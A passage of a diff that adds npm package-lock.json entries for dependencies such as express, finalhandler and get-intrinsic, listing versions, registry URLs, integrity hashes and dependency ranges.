"https://github.com/sponsors/ljharb" + } + }, + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/destroy": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz", + "integrity": "sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==", + "engines": { + "node": ">= 0.8", + "npm": "1.2.8000 || >= 1.4.16" + } + }, + "node_modules/diff3": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/diff3/-/diff3-0.0.3.tgz", + "integrity": "sha512-iSq8ngPOt0K53A6eVr4d5Kn6GNrM2nQZtC740pzIriHtn4pOQ2lyzEXQMBeVcWERN0ye7fhBsk9PbLLQOnUx/g==" + }, + "node_modules/dom-accessibility-api": { + "version": "0.5.16", + "resolved": "https://registry.npmjs.org/dom-accessibility-api/-/dom-accessibility-api-0.5.16.tgz", + "integrity": "sha512-X7BJ2yElsnOJ30pZF4uIIDfBEVgF4XEBxL9Bxhy6dnrm5hkzqmsWHGTiHqRiITNhMyFLyAiWndIJP7Z1NTteDg==" + }, + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "dependencies": { + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/ecc-jsbn": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", + "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", + "dependencies": { + "jsbn": "~0.1.0", + "safer-buffer": "^2.1.0" + } + }, + "node_modules/ee-first": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz", + "integrity": "sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow==" + }, + "node_modules/emoji-regex": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + }, + "node_modules/encodeurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", + "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "dependencies": { + "once": "^1.4.0" + } + }, + "node_modules/enquirer": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/enquirer/-/enquirer-2.4.1.tgz", + "integrity": "sha512-rRqJg/6gd538VHvR3PSrdRBb/1Vy2YfzHqzvbhGIQpDRKIa4FgV/54b5Q1xYSxOOwKvjXweS26E0Q+nAMwp2pQ==", + "dependencies": { + "ansi-colors": "^4.1.1", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8.6" + } + }, + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-get-iterator": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/es-get-iterator/-/es-get-iterator-1.1.3.tgz", + "integrity": "sha512-sPZmqHBe6JIiTfN5q2pEi//TwxmAFHwj/XEuYjTuse78i8KxaqMTTzxPoFKuzRpDpTJ+0NAbpfenkmH2rePtuw==", + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.1.3", + "has-symbols": "^1.0.3", + "is-arguments": "^1.1.1", + "is-map": "^2.0.2", + "is-set": "^2.0.2", + "is-string": "^1.0.7", + "isarray": "^2.0.5", + "stop-iteration-iterator": "^1.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/escape-html": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz", + "integrity": "sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow==" + }, + "node_modules/escape-string-regexp": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", + "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/etag": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/etag/-/etag-1.8.1.tgz", + "integrity": "sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/eventemitter2": { + "version": "6.4.7", + "resolved": "https://registry.npmjs.org/eventemitter2/-/eventemitter2-6.4.7.tgz", + "integrity": "sha512-tYUSVOGeQPKt/eC1ABfhHy5Xd96N3oIijJvN3O9+TsC28T5V9yX9oEfEK5faP0EFSNVOG97qtAS68GBrQB2hDg==" + }, + "node_modules/execa": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/execa/-/execa-4.1.0.tgz", + "integrity": "sha512-j5W0//W7f8UxAn8hXVnwG8tLwdiUy4FJLcSupCg6maBYZDpyBvTApK7KyuI4bKj8KOh1r2YH+6ucuYtJv1bTZA==", + "dependencies": { + "cross-spawn": "^7.0.0", + "get-stream": "^5.0.0", + "human-signals": "^1.1.1", + "is-stream": "^2.0.0", + "merge-stream": "^2.0.0", + "npm-run-path": "^4.0.0", + "onetime": "^5.1.0", + "signal-exit": "^3.0.2", + "strip-final-newline": "^2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sindresorhus/execa?sponsor=1" + } + }, + "node_modules/executable": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/executable/-/executable-4.1.1.tgz", + "integrity": "sha512-8iA79xD3uAch729dUG8xaaBBFGaEa0wdD2VkYLFHwlqosEj/jT66AzcreRDSgV7ehnNLBW2WR5jIXwGKjVdTLg==", + "dependencies": { + "pify": "^2.2.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/express": { + "version": "4.21.2", + "resolved": "https://registry.npmjs.org/express/-/express-4.21.2.tgz", + "integrity": "sha512-28HqgMZAmih1Czt9ny7qr6ek2qddF4FclbMzwhCREB6OFfH+rXAnuNCwo1/wFvrtbgsQDb4kSbX9de9lFbrXnA==", + "dependencies": { + "accepts": "~1.3.8", + "array-flatten": "1.1.1", + "body-parser": "1.20.3", + "content-disposition": "0.5.4", + "content-type": "~1.0.4", + "cookie": "0.7.1", + "cookie-signature": "1.0.6", + "debug": "2.6.9", + "depd": "2.0.0", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "finalhandler": "1.3.1", + "fresh": "0.5.2", + "http-errors": "2.0.0", + "merge-descriptors": "1.0.3", + "methods": "~1.1.2", + "on-finished": "2.4.1", + "parseurl": "~1.3.3", + "path-to-regexp": "0.1.12", + "proxy-addr": "~2.0.7", + "qs": "6.13.0", + "range-parser": "~1.2.1", + "safe-buffer": "5.2.1", + "send": "0.19.0", + "serve-static": "1.16.2", + "setprototypeof": "1.2.0", + "statuses": "2.0.1", + "type-is": "~1.6.18", + "utils-merge": "1.0.1", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.10.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/express" + } + }, + "node_modules/express/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/express/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/express/node_modules/qs": { + "version": "6.13.0", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.13.0.tgz", + "integrity": "sha512-+38qI9SOr8tfZ4QmJNplMUxqjbe7LKvvZgWdExBOmd+egZTtjLB67Gu0HRX3u/XOq7UU2Nx6nsjvS16Z9uwfpg==", + "dependencies": { + "side-channel": "^1.0.6" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/extend": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", + "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" + }, + "node_modules/extract-zip": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extract-zip/-/extract-zip-2.0.1.tgz", + "integrity": "sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==", + "dependencies": { + "debug": "^4.1.1", + "get-stream": "^5.1.0", + "yauzl": "^2.10.0" + }, + "bin": { + "extract-zip": "cli.js" + }, + "engines": { + "node": ">= 10.17.0" + }, + "optionalDependencies": { + "@types/yauzl": "^2.9.1" + } + }, + "node_modules/extsprintf": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", + "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", + "engines": [ + "node >=0.6.0" + ] + }, + "node_modules/fast-text-encoding": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/fast-text-encoding/-/fast-text-encoding-1.0.6.tgz", + "integrity": "sha512-VhXlQgj9ioXCqGstD37E/HBeqEGV/qOD/kmbVG8h5xKBYvM1L3lR1Zn4555cQ8GkYbJa8aJSipLPndE1k6zK2w==" + }, + "node_modules/fd-slicer": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/fd-slicer/-/fd-slicer-1.1.0.tgz", + "integrity": "sha512-cE1qsB/VwyQozZ+q1dGxR8LBYNZeofhEdUNGSMbQD3Gw2lAzX9Zb3uIU6Ebc/Fmyjo9AWWfnn0AUCHqtevs/8g==", + "dependencies": { + "pend": "~1.2.0" + } + }, + "node_modules/figures": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/figures/-/figures-3.2.0.tgz", + "integrity": "sha512-yaduQFRKLXYOGgEn6AZau90j3ggSOyiqXU0F9JZfeXYhNa+Jk4X+s45A2zg5jns87GAFa34BBm2kXw4XpNcbdg==", + "dependencies": { + "escape-string-regexp": "^1.0.5" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/finalhandler": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.1.tgz", + "integrity": "sha512-6BN9trH7bp3qvnrRyzsBz+g3lZxTNZTbVO2EV1CS0WIcDbawYVdYvGflME/9QP0h0pYlCDBCTjYa9nZzMDpyxQ==", + "dependencies": { + "debug": "2.6.9", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "on-finished": "2.4.1", + "parseurl": "~1.3.3", + "statuses": "2.0.1", + "unpipe": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/finalhandler/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/finalhandler/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/for-each": { + "version": "0.3.3", + "resolved": "https://registry.npmjs.org/for-each/-/for-each-0.3.3.tgz", + "integrity": "sha512-jqYfLp7mo9vIyQf8ykW2v7A+2N4QjeCeI5+Dz9XraiO1ign81wjiH7Fb9vSOWvQfNtmSa4H2RoQTrrXivdUZmw==", + "dependencies": { + "is-callable": "^1.1.3" + } + }, + "node_modules/forever-agent": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", + "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", + "engines": { + "node": "*" + } + }, + "node_modules/form-data": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", + "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/forwarded": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz", + "integrity": "sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/fresh": { + "version": "0.5.2", + "resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz", + "integrity": "sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/fs-extra": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/functions-have-names": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/functions-have-names/-/functions-have-names-1.2.3.tgz", + "integrity": "sha512-xckBUXyTIqT97tq2x2AMb+g163b5JFysYk0x4qxNFwbfQkmNZoiRHb6sPzI9/QV33WeuvVYBUIiD4NzNIyqaRQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "dependencies": { + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/get-stream": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-5.2.0.tgz", + "integrity": "sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==", + "dependencies": { + "pump": "^3.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/getos": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/getos/-/getos-3.2.1.tgz", + "integrity": "sha512-U56CfOK17OKgTVqozZjUKNdkfEv6jk5WISBJ8SHoagjE6L69zOwl3Z+O8myjY9MEW3i2HPWQBt/LTbCgcC973Q==", + "dependencies": { + "async": "^3.2.0" + } + }, + "node_modules/getpass": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", + "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", + "dependencies": { + "assert-plus": "^1.0.0" + } + }, + "node_modules/global-dirs": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/global-dirs/-/global-dirs-3.0.1.tgz", + "integrity": "sha512-NBcGGFbBA9s1VzD41QXDG+3++t9Mn5t1FpLdhESY6oKY4gYTFpX4wO3sqGUa0Srjtbfj3szX0RnemmrVRUdULA==", + "dependencies": { + "ini": "2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==" + }, + "node_modules/has-bigints": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-bigints/-/has-bigints-1.0.2.tgz", + "integrity": "sha512-tSvCKtBr9lkF0Ex0aQiP9N+OpV4zi2r/Nee5VkRDbaqv35RLYMzbwQfFSZZH0kR+Rd6302UJZ2p/bJCEoR3VoQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/has-property-descriptors": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/has-property-descriptors/-/has-property-descriptors-1.0.1.tgz", + "integrity": "sha512-VsX8eaIewvas0xnvinAe9bw4WfIeODpGYikiWYLH+dma0Jw6KHYqWiWfhQlgOVK8D6PvjubK5Uc4P0iIhIcNVg==", + "dependencies": { + "get-intrinsic": "^1.2.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-tostringtag": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.0.tgz", + "integrity": "sha512-kFjcSNhnlGV1kyoGk7OXKSawH5JOb/LzUc5w9B02hOTO0dfFRjbHQKvg1d6cf3HbeUmtU9VbbV3qzZ2Teh97WQ==", + "dependencies": { + "has-symbols": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dependencies": { + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/http-errors": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-2.0.0.tgz", + "integrity": "sha512-FtwrG/euBzaEjYeRqOgly7G0qviiXoJWnvEH2Z1plBdXgbyjv34pHTSb9zoeHMyDy33+DWy5Wt9Wo+TURtOYSQ==", + "dependencies": { + "depd": "2.0.0", + "inherits": "2.0.4", + "setprototypeof": "1.2.0", + "statuses": "2.0.1", + "toidentifier": "1.0.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/http-signature": { + "version": "1.3.6", + "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.3.6.tgz", + "integrity": "sha512-3adrsD6zqo4GsTqtO7FyrejHNv+NgiIfAfv68+jVlFmSr9OGy7zrxONceFRLKvnnZA5jbxQBX1u9PpB6Wi32Gw==", + "dependencies": { + "assert-plus": "^1.0.0", + "jsprim": "^2.0.2", + "sshpk": "^1.14.1" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/human-signals": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-1.1.1.tgz", + "integrity": "sha512-SEQu7vl8KjNL2eoGBLF3+wAjpsNfA9XMlXAYj/3EdaNfAlxKthD1xjEQfGOUhllCGGJVNY34bRr6lPINhNjyZw==", + "engines": { + "node": ">=8.12.0" + } + }, + "node_modules/iconv-lite": { + "version": "0.4.24", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz", + "integrity": "sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==", + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/ignore": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.3.1.tgz", + "integrity": "sha512-5Fytz/IraMjqpwfd34ke28PTVMjZjJG2MPn5t7OE4eUCUNf8BAa7b5WUS9/Qvr6mwOQS7Mk6vdsMno5he+T8Xw==", + "engines": { + "node": ">= 4" + } + }, + "node_modules/indent-string": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/indent-string/-/indent-string-4.0.0.tgz", + "integrity": "sha512-EdDDZu4A2OyIK7Lr/2zG+w5jmbuk1DVBnEwREQvBzspBJkCEbRa8GxU1lghYcaGJCnRWibjDXlq779X1/y5xwg==", + "engines": { + "node": ">=8" + } + }, + "node_modules/inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + }, + "node_modules/ini": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ini/-/ini-2.0.0.tgz", + "integrity": "sha512-7PnF4oN3CvZF23ADhA5wRaYEQpJ8qygSkbtTXWBeXWXmEVRXK+1ITciHWwHhsjv1TmW0MgacIv6hEi5pX5NQdA==", + "engines": { + "node": ">=10" + } + }, + "node_modules/internal-slot": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/internal-slot/-/internal-slot-1.0.6.tgz", + "integrity": "sha512-Xj6dv+PsbtwyPpEflsejS+oIZxmMlV44zAhG479uYu89MsjcYOhCFnNyKrkJrihbsiasQyY0afoCl/9BLR65bg==", + "dependencies": { + "get-intrinsic": "^1.2.2", + "hasown": "^2.0.0", + "side-channel": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/ipaddr.js": { + "version": "1.9.1", + "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz", + "integrity": "sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/is-arguments": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/is-arguments/-/is-arguments-1.1.1.tgz", + "integrity": "sha512-8Q7EARjzEnKpt/PCD7e1cgUS0a6X8u5tdSiMqXhojOdoV9TsMsiO+9VLC5vAmO8N7/GmXn7yjR8qnA6bVAEzfA==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": 